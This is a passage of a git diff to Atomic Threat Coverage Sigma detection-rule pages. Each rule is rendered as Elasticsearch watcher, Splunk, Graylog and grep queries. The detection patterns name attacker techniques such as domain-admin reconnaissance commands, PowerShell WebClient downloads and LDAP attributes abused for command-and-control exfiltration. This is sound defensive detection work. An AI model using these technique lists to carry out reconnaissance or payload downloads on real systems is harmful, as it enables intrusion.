curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/2887e914-ce96-435f-8105-593937e90757 <<EOF\n{\n "metadata": {\n "title": "Reconnaissance Activity with Net Command",\n "description": "Detects a set of commands often used in recon stages by different attack groups",\n "tags": [\n "attack.discovery",\n "attack.t1087",\n "attack.t1082",\n "car.2016-03-001"\n ],\n "query": "CommandLine.keyword:(tasklist OR net\\\\ time OR systeminfo OR whoami OR nbtstat OR net\\\\ start OR *\\\\\\\\net1\\\\ start OR qprocess OR nslookup OR hostname.exe OR *\\\\\\\\net1\\\\ user\\\\ \\\\/domain OR *\\\\\\\\net1\\\\ group\\\\ \\\\/domain OR *\\\\\\\\net1\\\\ group\\\\ \\\\\\"domain\\\\ admins\\\\\\"\\\\ \\\\/domain OR *\\\\\\\\net1\\\\ group\\\\ \\\\\\"Exchange\\\\ Trusted\\\\ Subsystem\\\\\\"\\\\ \\\\/domain OR *\\\\\\\\net1\\\\ accounts\\\\ \\\\/domain OR *\\\\\\\\net1\\\\ user\\\\ net\\\\ localgroup\\\\ administrators OR netstat\\\\ \\\\-an)"\n },\n "trigger": {\n "schedule": {\n "interval": "15s"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "CommandLine.keyword:(tasklist OR net\\\\ time OR systeminfo OR whoami OR nbtstat OR net\\\\ start OR *\\\\\\\\net1\\\\ start OR qprocess OR nslookup OR hostname.exe OR *\\\\\\\\net1\\\\ user\\\\ \\\\/domain OR *\\\\\\\\net1\\\\ group\\\\ \\\\/domain OR *\\\\\\\\net1\\\\ group\\\\ \\\\\\"domain\\\\ admins\\\\\\"\\\\ \\\\/domain OR *\\\\\\\\net1\\\\ group\\\\ \\\\\\"Exchange\\\\ Trusted\\\\ Subsystem\\\\\\"\\\\ \\\\/domain OR *\\\\\\\\net1\\\\ accounts\\\\ \\\\/domain OR *\\\\\\\\net1\\\\ user\\\\ net\\\\ localgroup\\\\ administrators OR netstat\\\\ \\\\-an)",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n },\n "aggs": {\n "by": {\n "terms": {\n "field": "CommandLine",\n "size": 10,\n "order": {\n "_count": "desc"\n },\n "min_doc_count": 5\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.aggregations.by.buckets.0.doc_count": {\n "gt": 4\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'Reconnaissance Activity with Net Command\'",\n "body": "Hits:\\n{{#aggregations.by.buckets}}\\n {{key}} {{doc_count}}\\n{{/aggregations.by.buckets}}\\n",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
```

13
Atomic_Threat_Coverage/Detection_Rules/win_susp_dhcp_config.md
View File

@ -36,6 +36,7 @@ logsource:
detection:
selection:
EventID: 1033
Source: Microsoft-Windows-DHCP-Server
condition: selection
falsepositives:
- Unknown
@ -50,42 +51,42 @@ level: critical
### es-qs
```
EventID:"1033"
(EventID:"1033" AND Source:"Microsoft\\-Windows\\-DHCP\\-Server")
```
### xpack-watcher
```
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/13fc89a9-971e-4ca6-b9dc-aa53a445bf40 <<EOF\n{\n "metadata": {\n "title": "DHCP Server Loaded the CallOut DLL",\n "description": "This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded",\n "tags": [\n "attack.defense_evasion",\n "attack.t1073"\n ],\n "query": "EventID:\\"1033\\""\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "EventID:\\"1033\\"",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'DHCP Server Loaded the CallOut DLL\'",\n "body": "Hits:\\n{{#ctx.payload.hits.hits}}{{_source}}\\n================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/13fc89a9-971e-4ca6-b9dc-aa53a445bf40 <<EOF\n{\n "metadata": {\n "title": "DHCP Server Loaded the CallOut DLL",\n "description": "This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded",\n "tags": [\n "attack.defense_evasion",\n "attack.t1073"\n ],\n "query": "(EventID:\\"1033\\" AND Source:\\"Microsoft\\\\-Windows\\\\-DHCP\\\\-Server\\")"\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "(EventID:\\"1033\\" AND Source:\\"Microsoft\\\\-Windows\\\\-DHCP\\\\-Server\\")",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'DHCP Server Loaded the CallOut DLL\'",\n "body": "Hits:\\n{{#ctx.payload.hits.hits}}{{_source}}\\n================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
```
### graylog
```
EventID:"1033"
(EventID:"1033" AND Source:"Microsoft\\-Windows\\-DHCP\\-Server")
```
### splunk
```
EventID="1033"
(EventID="1033" Source="Microsoft-Windows-DHCP-Server")
```
### logpoint
```
(event_source="Microsoft-Windows-Security-Auditing" event_id="1033")
(event_source="Microsoft-Windows-Security-Auditing" event_id="1033" Source="Microsoft-Windows-DHCP-Server")
```
### grep
```
grep -P '^1033'
grep -P '^(?:.*(?=.*1033)(?=.*Microsoft-Windows-DHCP-Server))'
```

2
Atomic_Threat_Coverage/Detection_Rules/win_susp_failed_logons_single_source.md
View File

File diff suppressed because one or more lines are too long

97
Atomic_Threat_Coverage/Detection_Rules/win_susp_ldap_dataexchange.md Normal file
View File

@ -0,0 +1,97 @@
| Title | Suspicious LDAP-Attributes Used |
|:-------------------------|:------------------|
| **Description** | detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies. |
| **ATT&amp;CK Tactic** | <ul><li>[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)</li></ul> |
| **ATT&amp;CK Technique** | <ul><li>[T1041: Exfiltration Over Command and Control Channel](https://attack.mitre.org/techniques/T1041)</li></ul> |
| **Data Needed** | <ul><li>[DN_0026_5136_windows_directory_service_object_was_modified](../Data_Needed/DN_0026_5136_windows_directory_service_object_was_modified.md)</li></ul> |
| **Trigger** | <ul><li>[T1041: Exfiltration Over Command and Control Channel](../Triggers/T1041.md)</li></ul> |
| **Severity Level** | high |
| **False Positives** | <ul><li>Companies, who may use these default LDAP-Attributes for personal information</li></ul> |
| **Development Status** | experimental |
| **References** | <ul><li>[https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961](https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961)</li><li>[https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/](https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/)</li><li>[https://github.com/fox-it/LDAPFragger](https://github.com/fox-it/LDAPFragger)</li></ul> |
| **Author** | xknow @xknow_infosec |
## Detection Rules
### Sigma rule
```
title: Suspicious LDAP-Attributes Used
id: d00a9a72-2c09-4459-ad03-5e0a23351e36
description: detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies.
status: experimental
date: 2019/03/24
author: xknow @xknow_infosec
references:
- https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961
- https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/
- https://github.com/fox-it/LDAPFragger
tags:
- attack.t1041
- attack.persistence
logsource:
product: windows
service: security
detection:
selection:
EventID: 5136
AttributeValue: '*'
AttributeLDAPDisplayName:
- 'primaryInternationalISDNNumber'
- 'otherFacsimileTelephoneNumber'
- 'primaryTelexNumber'
condition: selection
falsepositives:
- Companies, who may use these default LDAP-Attributes for personal information
level: high
```
### es-qs
```
(EventID:"5136" AND AttributeValue.keyword:* AND AttributeLDAPDisplayName:("primaryInternationalISDNNumber" OR "otherFacsimileTelephoneNumber" OR "primaryTelexNumber"))
```
### xpack-watcher
```
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/d00a9a72-2c09-4459-ad03-5e0a23351e36 <<EOF\n{\n "metadata": {\n "title": "Suspicious LDAP-Attributes Used",\n "description": "detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies.",\n "tags": [\n "attack.t1041",\n "attack.persistence"\n ],\n "query": "(EventID:\\"5136\\" AND AttributeValue.keyword:* AND AttributeLDAPDisplayName:(\\"primaryInternationalISDNNumber\\" OR \\"otherFacsimileTelephoneNumber\\" OR \\"primaryTelexNumber\\"))"\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "(EventID:\\"5136\\" AND AttributeValue.keyword:* AND AttributeLDAPDisplayName:(\\"primaryInternationalISDNNumber\\" OR \\"otherFacsimileTelephoneNumber\\" OR \\"primaryTelexNumber\\"))",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'Suspicious LDAP-Attributes Used\'",\n "body": "Hits:\\n{{#ctx.payload.hits.hits}}{{_source}}\\n================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
```
### graylog
```
(EventID:"5136" AND AttributeValue.keyword:* AND AttributeLDAPDisplayName:("primaryInternationalISDNNumber" "otherFacsimileTelephoneNumber" "primaryTelexNumber"))
```
### splunk
```
(EventID="5136" AttributeValue="*" (AttributeLDAPDisplayName="primaryInternationalISDNNumber" OR AttributeLDAPDisplayName="otherFacsimileTelephoneNumber" OR AttributeLDAPDisplayName="primaryTelexNumber"))
```
### logpoint
```
(event_source="Microsoft-Windows-Security-Auditing" event_id="5136" AttributeValue="*" AttributeLDAPDisplayName IN ["primaryInternationalISDNNumber", "otherFacsimileTelephoneNumber", "primaryTelexNumber"])
```
### grep
```
grep -P '^(?:.*(?=.*5136)(?=.*.*)(?=.*(?:.*primaryInternationalISDNNumber|.*otherFacsimileTelephoneNumber|.*primaryTelexNumber)))'
```

4
Atomic_Threat_Coverage/Detection_Rules/win_susp_mshta_execution.md
View File

@ -21,8 +21,8 @@ title: MSHTA Suspicious Execution 01
id: cc7abbd0-762b-41e3-8a26-57ad50d2eea3
status: experimental
description: Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism
date: 22/02/2019
modified: 22/02/2019
date: 2019/02/22
modified: 2019/02/22
author: Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule)
references:
- http://blog.sevagas.com/?Hacking-around-HTA-files

93
Atomic_Threat_Coverage/Detection_Rules/win_susp_ps_downloadfile.md Normal file
View File

@ -0,0 +1,93 @@
| Title | PowerShell DownloadFile |
|:-------------------------|:------------------|
| **Description** | Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line |
| **ATT&amp;CK Tactic** | <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul> |
| **ATT&amp;CK Technique** | <ul><li>[T1086: PowerShell](https://attack.mitre.org/techniques/T1086)</li></ul> |
| **Data Needed** | <ul><li>[DN_0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN_0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN_0003_1_windows_sysmon_process_creation](../Data_Needed/DN_0003_1_windows_sysmon_process_creation.md)</li></ul> |
| **Trigger** | <ul><li>[T1086: PowerShell](../Triggers/T1086.md)</li></ul> |
| **Severity Level** | high |
| **False Positives** | <ul><li>Unknown</li></ul> |
| **Development Status** | experimental |
| **References** | <ul><li>[https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html](https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html)</li></ul> |
| **Author** | Florian Roth |
## Detection Rules
### Sigma rule
```
title: PowerShell DownloadFile
id: 8f70ac5f-1f6f-4f8e-b454-db19561216c5
status: experimental
description: Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line
references:
- https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html
author: Florian Roth
date: 2020/03/25
tags:
- attack.execution
- attack.t1086
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains|all:
- 'powershell'
- '.DownloadFile'
- 'System.Net.WebClient'
condition: selection
falsepositives:
- Unknown
level: high
```
### es-qs
```
(CommandLine.keyword:*powershell* AND CommandLine.keyword:*.DownloadFile* AND CommandLine.keyword:*System.Net.WebClient*)
```
### xpack-watcher
```
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/8f70ac5f-1f6f-4f8e-b454-db19561216c5 <<EOF\n{\n "metadata": {\n "title": "PowerShell DownloadFile",\n "description": "Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line",\n "tags": [\n "attack.execution",\n "attack.t1086"\n ],\n "query": "(CommandLine.keyword:*powershell* AND CommandLine.keyword:*.DownloadFile* AND CommandLine.keyword:*System.Net.WebClient*)"\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "(CommandLine.keyword:*powershell* AND CommandLine.keyword:*.DownloadFile* AND CommandLine.keyword:*System.Net.WebClient*)",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'PowerShell DownloadFile\'",\n "body": "Hits:\\n{{#ctx.payload.hits.hits}}{{_source}}\\n================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
```
### graylog
```
(CommandLine.keyword:*powershell* AND CommandLine.keyword:*.DownloadFile* AND CommandLine.keyword:*System.Net.WebClient*)
```
### splunk
```
(CommandLine="*powershell*" CommandLine="*.DownloadFile*" CommandLine="*System.Net.WebClient*")
```
### logpoint
```
(event_id="1" CommandLine="*powershell*" CommandLine="*.DownloadFile*" CommandLine="*System.Net.WebClient*")
```
### grep
```
grep -P '^(?:.*(?=.*.*powershell.*)(?=.*.*\\.DownloadFile.*)(?=.*.*System\\.Net\\.WebClient.*))'
```

2
Atomic_Threat_Coverage/Detection_Rules/win_susp_security_eventlog_cleared.md
View File

@ -3,7 +3,7 @@
| **Description** | Some threat groups tend to delete the local 'Security' Eventlog using certain utitlities |
| **ATT&amp;CK Tactic** | <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul> |
| **ATT&amp;CK Technique** | <ul><li>[T1070: Indicator Removal on Host](https://attack.mitre.org/techniques/T1070)</li></ul> |
| **Data Needed** | <ul><li>[DN_0038_1102_the_audit_log_was_cleared](../Data_Needed/DN_0038_1102_the_audit_log_was_cleared.md)</li><li>[DN_0050_1102_audit_log_was_cleared](../Data_Needed/DN_0050_1102_audit_log_was_cleared.md)</li></ul> |
| **Data Needed** | <ul><li>[DN_0050_1102_audit_log_was_cleared](../Data_Needed/DN_0050_1102_audit_log_was_cleared.md)</li></ul> |
| **Trigger** | <ul><li>[T1070: Indicator Removal on Host](../Triggers/T1070.md)</li></ul> |
| **Severity Level** | high |
| **False Positives** | <ul><li>Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)</li><li>System provisioning (system reset before the golden image creation)</li></ul> |

2
Atomic_Threat_Coverage/Detection_Rules/win_susp_svchost_no_cli.md
View File

@ -24,7 +24,7 @@ description: It is extremely abnormal for svchost.exe to spawn without any CLI a
references:
- https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2
author: David Burkett
date: 12/28/2019
date: 2019/12/28
tags:
- attack.t1055
logsource:

5
Atomic_Threat_Coverage/Detection_Rules/win_sysmon_driver_unload.md
View File

@ -6,7 +6,7 @@
| **Data Needed** | <ul><li>[DN_0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN_0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN_0003_1_windows_sysmon_process_creation](../Data_Needed/DN_0003_1_windows_sysmon_process_creation.md)</li></ul> |
| **Trigger** | There is no documented Trigger for this Detection Rule yet |
| **Severity Level** | high |
| **False Positives** | <ul><li>U</li><li>n</li><li>k</li><li>n</li><li>o</li><li>w</li><li>n</li></ul> |
| **False Positives** | <ul><li>Unknown</li></ul> |
| **Development Status** | experimental |
| **References** | <ul><li>[https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon](https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon)</li></ul> |
| **Author** | Kirill Kiryanov, oscd.community |
@ -36,7 +36,8 @@ detection:
- 'unload'
- 'sys'
condition: selection
falsepositives: Unknown
falsepositives:
- Unknown
level: high
fields:
- CommandLine

15
Atomic_Threat_Coverage/Detection_Rules/win_system_exe_anomaly.md
View File

@ -48,10 +48,11 @@ detection:
- '*\lsm.exe'
- '*\winlogon.exe'
- '*\explorer.exe'
- '*\taskhost.exe'
- '*\taskhost.exe'
filter:
Image:
- 'C:\Windows\System32\\*'
- 'C:\Windows\system32\\*'
- 'C:\Windows\SysWow64\\*'
- 'C:\Windows\SysWOW64\\*'
- 'C:\Windows\explorer.exe'
@ -76,42 +77,42 @@ level: high
### es-qs
```
(Image.keyword:(*\\\\svchost.exe OR *\\\\rundll32.exe OR *\\\\services.exe OR *\\\\powershell.exe OR *\\\\regsvr32.exe OR *\\\\spoolsv.exe OR *\\\\lsass.exe OR *\\\\smss.exe OR *\\\\csrss.exe OR *\\\\conhost.exe OR *\\\\wininit.exe OR *\\\\lsm.exe OR *\\\\winlogon.exe OR *\\\\explorer.exe OR *\\\\taskhost.exe) AND (NOT (Image.keyword:(C\\:\\\\Windows\\\\System32\\\\* OR C\\:\\\\Windows\\\\SysWow64\\\\* OR C\\:\\\\Windows\\\\SysWOW64\\\\* OR C\\:\\\\Windows\\\\explorer.exe OR C\\:\\\\Windows\\\\winsxs\\\\* OR C\\:\\\\Windows\\\\WinSxS\\\\* OR \\\\SystemRoot\\\\System32\\\\*))))
(Image.keyword:(*\\\\svchost.exe OR *\\\\rundll32.exe OR *\\\\services.exe OR *\\\\powershell.exe OR *\\\\regsvr32.exe OR *\\\\spoolsv.exe OR *\\\\lsass.exe OR *\\\\smss.exe OR *\\\\csrss.exe OR *\\\\conhost.exe OR *\\\\wininit.exe OR *\\\\lsm.exe OR *\\\\winlogon.exe OR *\\\\explorer.exe OR *\\\\taskhost.exe) AND (NOT (Image.keyword:(C\\:\\\\Windows\\\\System32\\\\* OR C\\:\\\\Windows\\\\system32\\\\* OR C\\:\\\\Windows\\\\SysWow64\\\\* OR C\\:\\\\Windows\\\\SysWOW64\\\\* OR C\\:\\\\Windows\\\\explorer.exe OR C\\:\\\\Windows\\\\winsxs\\\\* OR C\\:\\\\Windows\\\\WinSxS\\\\* OR \\\\SystemRoot\\\\System32\\\\*))))
```
### xpack-watcher
```
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/e4a6b256-3e47-40fc-89d2-7a477edd6915 <<EOF\n{\n "metadata": {\n "title": "System File Execution Location Anomaly",\n "description": "Detects a Windows program executable started in a suspicious folder",\n "tags": [\n "attack.defense_evasion",\n "attack.t1036"\n ],\n "query": "(Image.keyword:(*\\\\\\\\svchost.exe OR *\\\\\\\\rundll32.exe OR *\\\\\\\\services.exe OR *\\\\\\\\powershell.exe OR *\\\\\\\\regsvr32.exe OR *\\\\\\\\spoolsv.exe OR *\\\\\\\\lsass.exe OR *\\\\\\\\smss.exe OR *\\\\\\\\csrss.exe OR *\\\\\\\\conhost.exe OR *\\\\\\\\wininit.exe OR *\\\\\\\\lsm.exe OR *\\\\\\\\winlogon.exe OR *\\\\\\\\explorer.exe OR *\\\\\\\\taskhost.exe) AND (NOT (Image.keyword:(C\\\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\* OR C\\\\:\\\\\\\\Windows\\\\\\\\SysWow64\\\\\\\\* OR C\\\\:\\\\\\\\Windows\\\\\\\\SysWOW64\\\\\\\\* OR C\\\\:\\\\\\\\Windows\\\\\\\\explorer.exe OR C\\\\:\\\\\\\\Windows\\\\\\\\winsxs\\\\\\\\* OR C\\\\:\\\\\\\\Windows\\\\\\\\WinSxS\\\\\\\\* OR \\\\\\\\SystemRoot\\\\\\\\System32\\\\\\\\*))))"\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "(Image.keyword:(*\\\\\\\\svchost.exe OR *\\\\\\\\rundll32.exe OR *\\\\\\\\services.exe OR *\\\\\\\\powershell.exe OR *\\\\\\\\regsvr32.exe OR *\\\\\\\\spoolsv.exe OR *\\\\\\\\lsass.exe OR *\\\\\\\\smss.exe OR *\\\\\\\\csrss.exe OR *\\\\\\\\conhost.exe OR *\\\\\\\\wininit.exe OR *\\\\\\\\lsm.exe OR *\\\\\\\\winlogon.exe OR *\\\\\\\\explorer.exe OR *\\\\\\\\taskhost.exe) AND (NOT (Image.keyword:(C\\\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\* OR C\\\\:\\\\\\\\Windows\\\\\\\\SysWow64\\\\\\\\* OR C\\\\:\\\\\\\\Windows\\\\\\\\SysWOW64\\\\\\\\* OR C\\\\:\\\\\\\\Windows\\\\\\\\explorer.exe OR C\\\\:\\\\\\\\Windows\\\\\\\\winsxs\\\\\\\\* OR C\\\\:\\\\\\\\Windows\\\\\\\\WinSxS\\\\\\\\* OR \\\\\\\\SystemRoot\\\\\\\\System32\\\\\\\\*))))",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'System File Execution Location Anomaly\'",\n "body": "Hits:\\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\\nComputerName = {{_source.ComputerName}}\\n User = {{_source.User}}\\n Image = {{_source.Image}}================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/e4a6b256-3e47-40fc-89d2-7a477edd6915 <<EOF\n{\n "metadata": {\n "title": "System File Execution Location Anomaly",\n "description": "Detects a Windows program executable started in a suspicious folder",\n "tags": [\n "attack.defense_evasion",\n "attack.t1036"\n ],\n "query": "(Image.keyword:(*\\\\\\\\svchost.exe OR *\\\\\\\\rundll32.exe OR *\\\\\\\\services.exe OR *\\\\\\\\powershell.exe OR *\\\\\\\\regsvr32.exe OR *\\\\\\\\spoolsv.exe OR *\\\\\\\\lsass.exe OR *\\\\\\\\smss.exe OR *\\\\\\\\csrss.exe OR *\\\\\\\\conhost.exe OR *\\\\\\\\wininit.exe OR *\\\\\\\\lsm.exe OR *\\\\\\\\winlogon.exe OR *\\\\\\\\explorer.exe OR *\\\\\\\\taskhost.exe) AND (NOT (Image.keyword:(C\\\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\* OR C\\\\:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\* OR C\\\\:\\\\\\\\Windows\\\\\\\\SysWow64\\\\\\\\* OR C\\\\:\\\\\\\\Windows\\\\\\\\SysWOW64\\\\\\\\* OR C\\\\:\\\\\\\\Windows\\\\\\\\explorer.exe OR C\\\\:\\\\\\\\Windows\\\\\\\\winsxs\\\\\\\\* OR C\\\\:\\\\\\\\Windows\\\\\\\\WinSxS\\\\\\\\* OR \\\\\\\\SystemRoot\\\\\\\\System32\\\\\\\\*))))"\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "(Image.keyword:(*\\\\\\\\svchost.exe OR *\\\\\\\\rundll32.exe OR *\\\\\\\\services.exe OR *\\\\\\\\powershell.exe OR *\\\\\\\\regsvr32.exe OR *\\\\\\\\spoolsv.exe OR *\\\\\\\\lsass.exe OR *\\\\\\\\smss.exe OR *\\\\\\\\csrss.exe OR *\\\\\\\\conhost.exe OR *\\\\\\\\wininit.exe OR *\\\\\\\\lsm.exe OR *\\\\\\\\winlogon.exe OR *\\\\\\\\explorer.exe OR *\\\\\\\\taskhost.exe) AND (NOT (Image.keyword:(C\\\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\* OR C\\\\:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\* OR C\\\\:\\\\\\\\Windows\\\\\\\\SysWow64\\\\\\\\* OR C\\\\:\\\\\\\\Windows\\\\\\\\SysWOW64\\\\\\\\* OR C\\\\:\\\\\\\\Windows\\\\\\\\explorer.exe OR C\\\\:\\\\\\\\Windows\\\\\\\\winsxs\\\\\\\\* OR C\\\\:\\\\\\\\Windows\\\\\\\\WinSxS\\\\\\\\* OR \\\\\\\\SystemRoot\\\\\\\\System32\\\\\\\\*))))",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'System File Execution Location Anomaly\'",\n "body": "Hits:\\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\\nComputerName = {{_source.ComputerName}}\\n User = {{_source.User}}\\n Image = {{_source.Image}}================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
```
### graylog
```
(Image.keyword:(*\\\\svchost.exe *\\\\rundll32.exe *\\\\services.exe *\\\\powershell.exe *\\\\regsvr32.exe *\\\\spoolsv.exe *\\\\lsass.exe *\\\\smss.exe *\\\\csrss.exe *\\\\conhost.exe *\\\\wininit.exe *\\\\lsm.exe *\\\\winlogon.exe *\\\\explorer.exe *\\\\taskhost.exe) AND (NOT (Image.keyword:(C\\:\\\\Windows\\\\System32\\\\* C\\:\\\\Windows\\\\SysWow64\\\\* C\\:\\\\Windows\\\\SysWOW64\\\\* C\\:\\\\Windows\\\\explorer.exe C\\:\\\\Windows\\\\winsxs\\\\* C\\:\\\\Windows\\\\WinSxS\\\\* \\\\SystemRoot\\\\System32\\\\*))))
